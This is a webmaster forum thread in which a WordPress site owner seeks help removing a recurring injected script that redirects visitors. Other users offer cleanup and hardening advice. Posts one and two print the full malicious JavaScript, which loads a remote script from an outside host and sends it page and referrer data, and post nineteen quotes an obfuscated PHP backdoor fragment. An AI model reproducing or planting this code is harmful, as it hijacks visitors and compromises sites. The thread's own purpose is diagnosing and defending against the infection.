Scripts inserted in my WP themes header

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • ravenazrael
    Confirmed User
    • Nov 2011
    • 590

    #1

    Scripts inserted in my WP themes header

    somehow some scripts are placed in my them header that contain malware and redirect traffic to other sites
    I changed themes 3 times, got hosting scan the malaware, which they did and delet, but it happens every day. It points to different sites. some were adult dating sites. below a sample.
    How can I get rid of these things? it has costed memoney to fix some stuff and also lost over half of my traffic

    <script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
    www.boobsrealm.com
    www.bestboobscams.com
  • Brian mike
    #Alberta51
    • Oct 2014
    • 8735

    #2
    Originally posted by ravenazrael
    somehow some scripts are placed in my them header that contain malware and redirect traffic to other sites
    I changed themes 3 times, got hosting scan the malaware, which they did and delet, but it happens every day. It points to different sites. some were adult dating sites. below a sample.
    How can I get rid of these things? it has costed memoney to fix some stuff and also lost over half of my traffic

    <script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"=" +b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.lengt h;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b ))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cf goid",1,1),1==getCookie("__cfgoid")&&(setCookie("_ _cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
    Do you use ad network ? I mean are you a publisher ? This could be the way they get in your site.
    Without accuse any company you should look into this too.
    Tube - Cam - Escorts - Top List
    Menu Tab - Banner - Header Link - Blog Post
    DM me

    Comment

    • Fetish Gimp
      Confirmed User
      • Feb 2005
      • 1699

      #3
      I would suggest:
      • Make sure you're running updated Wordpress installations, and that all your plugins are updated.
      • If you're running any plugins that are not from the Wordpress repository, disable them. Enable them one at a time and check to see if the malicious code comes back.
      • Check that all Wordpress users with admin privileges are ones you know should exist, and change their passwords just in case.
      • Change your FTP user/passwords.


      Check out these links on making Wordpress more secure:
      https://codex.wordpress.org/Hardening_WordPress
      Securing WordPress: Hardening Basics | The State of Security
      https://www.wordfence.com/learn/how-...rdpress-sites/
      Strapon Seduction - femdom blog | Twitter

      Comment

      • ravenazrael
        Confirmed User
        • Nov 2011
        • 590

        #4
        Thanks. everything started when I used an ad networks script months ago, then stopped, then cleaned the whole site, but it has been returning many many times

        All plugins are from WP repository. The problem is that the issue happens every day or every two days so running without a plug in per day test may end like next year and still it may harm the website.
        the 3 admins are me and the developers I had to hire to fix the issue. no one else has logged in to the site as admin in the past weeks

        is there a way to block scripts?
        www.boobsrealm.com
        www.bestboobscams.com

        Comment

        • Brian mike
          #Alberta51
          • Oct 2014
          • 8735

          #5
          Can you check on your Jetpact stats and tell me if you see outbound click going to url like this : 01.wp.com etc ... if anything look similar?
          Many think those are legit outbound but THEY ARE NOT. i mean we have discover Hacked file with the above URL or similar.

          Also check webmaster/ tools USER owner property. if anyone new have been added as owner. Been hacked this way before.
          Tube - Cam - Escorts - Top List
          Menu Tab - Banner - Header Link - Blog Post
          DM me

          Comment

          • ravenazrael
            Confirmed User
            • Nov 2011
            • 590

            #6
            Originally posted by Brian mike
            Can you check on your Jetpact stats and tell me if you see outbound click going to url like this : 01.wp.com etc ... if anything look similar?
            Many think those are legit outbound but THEY ARE NOT. i mean we have discover Hacked file with the above URL or similar.

            Also check webmaster/ tools USER owner property. if anyone new have been added as owner. Been hacked this way before.
            nope, none of them show anything
            www.boobsrealm.com
            www.bestboobscams.com

            Comment

            • Colmike9
              (>^_^)b
              • Dec 2011
              • 7230

              #7
              Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid..
              Join the BEST cam affiliate program on the internet!
              I've referred over $1.7mil in spending this past year, you should join in.
              I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

              Comment

              • ravenazrael
                Confirmed User
                • Nov 2011
                • 590

                #8
                Originally posted by Colmike7
                Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid..
                i will do that, but still that may not stop them to do it, as they might just go to other affiliates. is there a way to block a specific script? regardless of the url?
                www.boobsrealm.com
                www.bestboobscams.com

                Comment

                • Brian mike
                  #Alberta51
                  • Oct 2014
                  • 8735

                  #9
                  Originally posted by ravenazrael
                  i will do that, but still that may not stop them to do it, as they might just go to other affiliates. is there a way to block a specific script? regardless of the url?
                  Talk to Roby http://gfy.com/business-services/122...l#post21246502

                  At this point if your tech can't fix it try another one mate. Or worst case change Theme.

                  Good Luck and keep us posted
                  Tube - Cam - Escorts - Top List
                  Menu Tab - Banner - Header Link - Blog Post
                  DM me

                  Comment

                  • Colmike9
                    (>^_^)b
                    • Dec 2011
                    • 7230

                    #10
                    Originally posted by ravenazrael
                    i will do that, but still that may not stop them to do it, as they might just go to other affiliates. is there a way to block a specific script? regardless of the url?
                    I have one way to block the script without removing it, but it's stupid so I won't post it..


                    Try removing the script, then change your cPanel and WP passwords, "harden" WP if you know how, remove plugins and themes that you don't use anymore, make sure file permissions are set right, see if there are any weird fake files added like jquery.min.php or .ftpquote, check uploads folder for things that don't belong, and sometimes people with this issue have resolved it with something called Sucuri.

                    Hope this helps.
                    Join the BEST cam affiliate program on the internet!
                    I've referred over $1.7mil in spending this past year, you should join in.
                    I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

                    Comment

                    • Brian mike
                      #Alberta51
                      • Oct 2014
                      • 8735

                      #11
                      Colmike your link is VIrusssssssssssss

                      DONT CLICK THIS LINK see bellow why

                      Tube - Cam - Escorts - Top List
                      Menu Tab - Banner - Header Link - Blog Post
                      DM me

                      Comment

                      • Colmike9
                        (>^_^)b
                        • Dec 2011
                        • 7230

                        #12
                        Originally posted by Brian mike
                        Colmike your link is VIrusssssssssssss

                        DONT CLICK THIS LINK see bellow why

                        I removed it, but that was just sucuri.net showing the malware in plain text.
                        Join the BEST cam affiliate program on the internet!
                        I've referred over $1.7mil in spending this past year, you should join in.
                        I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

                        Comment

                        • ravenazrael
                          Confirmed User
                          • Nov 2011
                          • 590

                          #13
                          ok thanks.. will let you know if something of this works out
                          www.boobsrealm.com
                          www.bestboobscams.com

                          Comment

                          • Google Expert
                            Webmaster
                            • Jun 2004
                            • 14294

                            #14
                            We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.

                            We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

                            They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.

                            Comment

                            • ravenazrael
                              Confirmed User
                              • Nov 2011
                              • 590

                              #15
                              Originally posted by Google Expert
                              We used to have exactly same thing. Even managed to track down the fucking russian down to his home address.

                              We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe.

                              They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server.
                              thanks. I'll need to get someone to do that.
                              www.boobsrealm.com
                              www.bestboobscams.com

                              Comment

                              • Bama
                                Confirmed User
                                • Nov 2001
                                • 2727

                                #16
                                If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.

                                Comment

                                • Relic
                                  So Fucking Banned
                                  • Aug 2002
                                  • 10300

                                  #17
                                  That's what you get not keeping software up to date, op.

                                  Comment

                                  • PornAffiliate
                                    Affiliate
                                    • Feb 2008
                                    • 247

                                    #18
                                    You probably already have tried some malware plugins - but if you havent tried this one I would give it a go: https://wordpress.org/plugins/gotmls/
                                    Porn Affiliate Programs - The Best Affiliate Programs & Some Webmaster Resources Like Free WP Themes.

                                    Comment

                                    • ravenazrael
                                      Confirmed User
                                      • Nov 2011
                                      • 590

                                      #19
                                      thanks guys and tahnsk for the recommendations.
                                      a i am not tech savy and the person helping me is MIA i tried to find the issue myself
                                      what is the dirs.php file supposed to do?
                                      i think that is one of the issues. it has crap like this one
                                      ${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));
                                      www.boobsrealm.com
                                      www.bestboobscams.com

                                      Comment

                                      • ravenazrael
                                        Confirmed User
                                        • Nov 2011
                                        • 590

                                        #20
                                        what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
                                        http://www.boobsrealm.com/wp-content.../wordfence.png
                                        www.boobsrealm.com
                                        www.bestboobscams.com

                                        Comment

                                        • Fetish Gimp
                                          Confirmed User
                                          • Feb 2005
                                          • 1699

                                          #21
                                          Originally posted by ravenazrael
                                          what is the dirs.php file supposed to do?
                                          i think that is one of the issues. it has crap like this one
                                          ${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));
                                          Wordpress itself does not have any such file.

                                          If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised.

                                          I would suggest trying this, in this order:
                                          1. Change all your server-related user/passwords (ftp/cpanel, ssh)
                                          2. Change all your Wordpress passwords
                                          3. Delete the dirs.php file you found


                                          If the script issue persists after all that, then your problem is as serious as Google Expert's because infected files are hidden somewhere else in your server.
                                          Strapon Seduction - femdom blog | Twitter

                                          Comment

                                          • Colmike9
                                            (>^_^)b
                                            • Dec 2011
                                            • 7230

                                            #22
                                            Originally posted by ravenazrael
                                            what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
                                            http://www.boobsrealm.com/wp-content.../wordfence.png
                                            Probably a bot checking sites for backdoors and/or other vulnerabilities..

                                            There are others, too, like if you see a bunch of random.com/something/feed showing up then that's a bot looking for content to scrape.
                                            Join the BEST cam affiliate program on the internet!
                                            I've referred over $1.7mil in spending this past year, you should join in.
                                            I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..

                                            Comment

                                            • lezinterracial
                                              Confirmed User
                                              • Jul 2012
                                              • 3117

                                              #23
                                              Originally posted by ravenazrael
                                              what does it mean when wordfence tells you that somebody came to your site and tried to access non existent page. the non-existent pages are not real pages...
                                              http://www.boobsrealm.com/wp-content.../wordfence.png
                                              That doesn't look malicious to me. Looks like your css in your theme is looking for a font that is in your theme that it can't find.

                                              I would search "fonts/fontawesome-webfont.woff2 found" or "themes/redwave-lite/fonts/fontawesome-webfont.woff?version=4.3.0"

                                              If you want to fix this error. You may want to look for your hack though.



                                              Are you on shared hosting? Can you find when your file is getting changed? Maybe check the site log for when the hacked file is getting updated.

                                              Did you change your ftp password like Fetish Gimp mentioned? Did you change your wordpress password?

                                              I like to rename wp-login.php to something else and change it back only when I need to make an update. I don't think this will help you, but may be worth a try.
                                              Live Sex Shows

                                              Comment

                                              • jscott
                                                jscizzle
                                                • Feb 2001
                                                • 25412

                                                #24
                                                ravenazrael, you are in for a big surprise. This shit has been hitting my sites for months, it's no easy cleanup. Sometimes they can make your sites appear to be normal while stealing all your Google traffic too.

                                                https://aw-snap.info/file-viewer/
                                                I found this online website scanning tool very helpful

                                                This is a terrible, terrible thing Good luck getting it fixed
                                                “If you think tough men are dangerous, wait until you see what weak men are capable of.”
                                                —Jordan B. Peterson

                                                Listen to Pomp tell why is Bitcoin important

                                                Comment

                                                • ravenazrael
                                                  Confirmed User
                                                  • Nov 2011
                                                  • 590

                                                  #25
                                                  Thanks to everybody!
                                                  Yes it has been hitting me for months and it looked normal for a while. my traffic has gone to 1/3 now
                                                  www.boobsrealm.com
                                                  www.bestboobscams.com

                                                  Comment

                                                  • just a punk
                                                    So fuckin' bored
                                                    • Jun 2003
                                                    • 32393

                                                    #26
                                                    Originally posted by Bama
                                                    If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.
                                                    According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.
                                                    Obey the Cowgod

                                                    Comment

                                                    • ravenazrael
                                                      Confirmed User
                                                      • Nov 2011
                                                      • 590

                                                      #27
                                                      Originally posted by CyberSEO
                                                      According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.
                                                      all plugins were download from the WP repository... files were cleared... but script returned again =(
                                                      www.boobsrealm.com
                                                      www.bestboobscams.com

                                                      Comment

                                                      • Brian mike
                                                        #Alberta51
                                                        • Oct 2014
                                                        • 8735

                                                        #28
                                                        Originally posted by ravenazrael
                                                        all plugins were download from the WP repository... files were cleared... but script returned again =(
                                                        Blame Donald Trump ( Joke aside trying to make you smile for 5 sec. ) I feel you mate, do you think its time to wipe out ?

                                                        I have my part of problem also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours grrrrr.

                                                        At least you know where the problem come from, i suggest you to TAKE Big action to wipe it out.
                                                        Tube - Cam - Escorts - Top List
                                                        Menu Tab - Banner - Header Link - Blog Post
                                                        DM me

                                                        Comment

                                                        • ravenazrael
                                                          Confirmed User
                                                          • Nov 2011
                                                          • 590

                                                          #29
                                                          Originally posted by Brian mike
                                                          Blame Donald Trump ( Joke aside trying to make you smile for 5 sec. ) I feel you mate, do you think its time to wipe out ?

                                                          I have my part of problem also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours grrrrr.

                                                          At least you know where the problem come from, i suggest you to TAKE Big action to wipe it out.
                                                          by wipe out you mean the whole site and content?? =(
                                                          www.boobsrealm.com
                                                          www.bestboobscams.com

                                                          Comment

                                                          • Fetish Gimp
                                                            Confirmed User
                                                            • Feb 2005
                                                            • 1699

                                                            #30
                                                            Originally posted by ravenazrael
                                                            by wipe out you mean the whole site and content?? =(
                                                            I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

                                                            One thing you might wanna do is to search your Wordpress database(s)for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.
                                                            Strapon Seduction - femdom blog | Twitter

                                                            Comment

                                                            • ravenazrael
                                                              Confirmed User
                                                              • Nov 2011
                                                              • 590

                                                              #31
                                                              Originally posted by Fetish Gimp
                                                              I believe what he means is that you back-up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.

                                                              One thing you might wanna do is to search your Wordpress database(s)for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.
                                                              thanks. well that was done before... two months ago.. and the problem persisted
                                                              www.boobsrealm.com
                                                              www.bestboobscams.com

                                                              Comment

                                                              • ravenazrael
                                                                Confirmed User
                                                                • Nov 2011
                                                                • 590

                                                                #32
                                                                seems it is finally solved. thanks to you all!
                                                                www.boobsrealm.com
                                                                www.bestboobscams.com

                                                                Comment

                                                                • jscott
                                                                  jscizzle
                                                                  • Feb 2001
                                                                  • 25412

                                                                  #33
                                                                  oh it's never solved
                                                                  “If you think tough men are dangerous, wait until you see what weak men are capable of.”
                                                                  —Jordan B. Peterson

                                                                  Listen to Pomp tell why is Bitcoin important

                                                                  Comment

                                                                  • klinton
                                                                    So Fucking Banned
                                                                    • Apr 2003
                                                                    • 8766

                                                                    #34
                                                                    so how did you fix it ?
                                                                    Originally posted by ravenazrael
                                                                    seems it is finally solved. thanks to you all!

                                                                    Comment

                                                                    • PornDiscounts-V
                                                                      Confirmed User
                                                                      • Oct 2003
                                                                      • 5744

                                                                      #35
                                                                      They may likely made many backdoor shells. Beat bet is to format, then import only posts from old database on fresh install.
                                                                      Blog Posts - Contextual Links - Hardlinks on 600+ Blog Network
                                                                      * Handwritten * 180 C Class IPs * Permanent! * Many Niches! * Bulk Discounts! GFYPosts /at/ J2Media.net

                                                                      Comment

                                                                      • MichaelA2014
                                                                        Registered User
                                                                        • Oct 2014
                                                                        • 9

                                                                        #36
                                                                        Back up only post content and images. nothing else. Then do a clean install. Most likely you got that code when you 'tried' one of those nulled plugins from blackhat forums or let one of those bargain freelancers work on your site.

                                                                        Comment

                                                                        • j3rkules
                                                                          VIP
                                                                          • Jul 2013
                                                                          • 22111

                                                                          #37
                                                                          Originally posted by klinton
                                                                          so how did you fix it ?
                                                                          I am also curious after reading all of this.

                                                                          Comment

                                                                          • Google Expert
                                                                            Webmaster
                                                                            • Jun 2004
                                                                            • 14294

                                                                            #38
                                                                            Originally posted by ravenazrael
                                                                            all plugins were download from the WP repository... files were cleared... but script returned again =(
                                                                            I already told you. The script infected all your server.

                                                                            You need format HDD and do a clean OS install.

                                                                            Other than this, nothing will help.

                                                                            Comment

                                                                            • Paz
                                                                              Confirmed User
                                                                              • Jun 2012
                                                                              • 457

                                                                              #39
                                                                              Originally posted by Google Expert
                                                                              I already told you. The script infected all your server.

                                                                              You need format HDD and do a clean OS install.

                                                                              Other than this, nothing will help.
                                                                              This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.

                                                                              Comment

                                                                              • ravenazrael
                                                                                Confirmed User
                                                                                • Nov 2011
                                                                                • 590

                                                                                #40
                                                                                Originally posted by Paz
                                                                                This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
                                                                                yep.. that is what worked.. so far
                                                                                I actually never downloaded any plugin or script from BHW. i remember it all started when I inserted a script from a well-known ad network. Not sure if it triggered it or was coincidence
                                                                                www.boobsrealm.com
                                                                                www.bestboobscams.com

                                                                                Comment

                                                                                • ErectMedia
                                                                                  Confirmed Chicago Pimp
                                                                                  • Aug 2004
                                                                                  • 7100

                                                                                  #41
                                                                                  Basics....

                                                                                  https://ithemes.com/2016/10/13/how-t...ly-and-easily/

                                                                                  Good plugin...

                                                                                  https://wordpress.org/plugins/all-in...-and-firewall/

                                                                                  If that doesn't do it could route DNS through Incapsula to kill off some bad shit before it even gets to your server. CloudFlare more popular and a good CDN but in terms of security Incapsula's free plan blocks more bad shit out than CloudFlare's paid plan.

                                                                                  Comment

                                                                                  • Shoplifter
                                                                                    Richest man in Babylon
                                                                                    • Jan 2002
                                                                                    • 5846

                                                                                    #42
                                                                                    It is possible to clean out a hacked Wordpress setup and indeed I have done it.

                                                                                    One thing that may help you is this: find /pathtoyourfiles/yourblog.com -mtime -2 -ls

                                                                                    It will list all of the files that have been modified in the past two days, which is very helpful in catching backdoor shell scripts and files being placed on your server.

                                                                                    If the attacker is using your site to send spam emails it's easy to find the originating script from the email header. Then you can delete it and also search in your logs for other scripts being used to send email. Usually the attacker will have three systems going, one is the actual backdoor that allows him to place files on your server, the other are the scripts that they use to send spam emails, and the other is a page on your website that acts as an endpoint for the URLs in his spam emails. This is the classic attack these days and once you can wrap your head around what they are trying to so it's a lot easier to prevent it.

                                                                                    It can also help if you use something like wordfence which will catch some but not all of the problems. Also keep your plugins up to date and delete any old plugins and themes.

                                                                                    Comment

                                                                                    • ravenazrael
                                                                                      Confirmed User
                                                                                      • Nov 2011
                                                                                      • 590

                                                                                      #43
                                                                                      thank you! I hope all this also helps somebody else who may have similar issues in the future
                                                                                      www.boobsrealm.com
                                                                                      www.bestboobscams.com

                                                                                      Comment

                                                                                      • Google Expert
                                                                                        Webmaster
                                                                                        • Jun 2004
                                                                                        • 14294

                                                                                        #44
                                                                                        Originally posted by Paz
                                                                                        This isn't true. You can update plugins themes, run malware scanners and update all your passwords then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
                                                                                        Do you understand that he injected the code everywhere outside the WordPress?

                                                                                        We had spend 6 months trying to clean it out from our server. It would always come back. In the end we had to format HD and reinstall OS.

                                                                                        P.S.
                                                                                        they also try to hide their presence by redirecting certain countries only. So you may be viewing the site and thinking that all is good, while people from other countries are being redirected to his doorway pages.

                                                                                        Comment

                                                                                        Working...